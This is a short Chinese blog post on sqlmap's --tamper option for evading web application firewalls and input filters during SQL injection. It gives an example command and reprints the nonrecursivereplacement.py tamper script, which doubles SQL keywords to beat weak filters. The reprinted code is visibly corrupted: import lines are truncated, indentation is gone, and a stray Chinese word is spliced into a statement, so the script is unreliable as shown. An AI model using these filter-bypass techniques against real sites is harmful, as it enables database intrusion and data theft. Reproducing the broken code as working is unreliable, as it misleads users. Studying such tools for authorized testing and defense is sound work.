sqlmap之tamper参数
1、tamper参数:在⼀定程度上避开应⽤程序敏感字符过滤,绕过WAF的阻挡。
2、tamper⽤法:
sqlmap -u "URL" --level=3 -p "注⼊参数" --tamper="xxx.py"
注:--tamper 后⾯加脚本,在kali的sqlmap下⾃带有tamper脚本⼏⼗种,⽬录为usr/share/sqlmap/tamper
3、sqlmap中tamper脚本功能解释
太多了,懒得写,具体看这个“sqlmap-tamper脚本分类翻译对照”吧
注:从sqlmap1.2.12开始的版本没有nonrecursivereplacement.py脚本,可以去github在它之前的⽼版本⾥下载⼀个放到新版本的usr/share/sqlmap/tamper⽬录下,或者我直接复制下来了,你们在nonrecursivereplacement.py下建⼀个py⽂件也可。
#!/usr/bin/env python
"""
See the file 'doc/COPYING' for copying permission
"""
import random
import re
n import singleTimeWarnMessage
nums import PRIORITY
__priority__ = PRIORITY.NORMAL
def tamper(payload, **kwargs):
"""
Replaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace("SELECT", "")) filters
Notes:
* Useful to bypass very weak custom filters
>>> random.seed(0)
>>> tamper('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
"""
keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE")
retVal = payload
warnMsg = "currently only couple of keywords are being processed %s. " % str(keywords)
warnMsg += "You can set it manually according to your needs"
singleTimeWarnMessage(warnMsg)
if payload:
for keyword in keywords:
_ = random.randint(1, len(keyword) - 1)
random翻译retVal = re.sub(r"(?i)\b%s\b" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal) return retVal
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论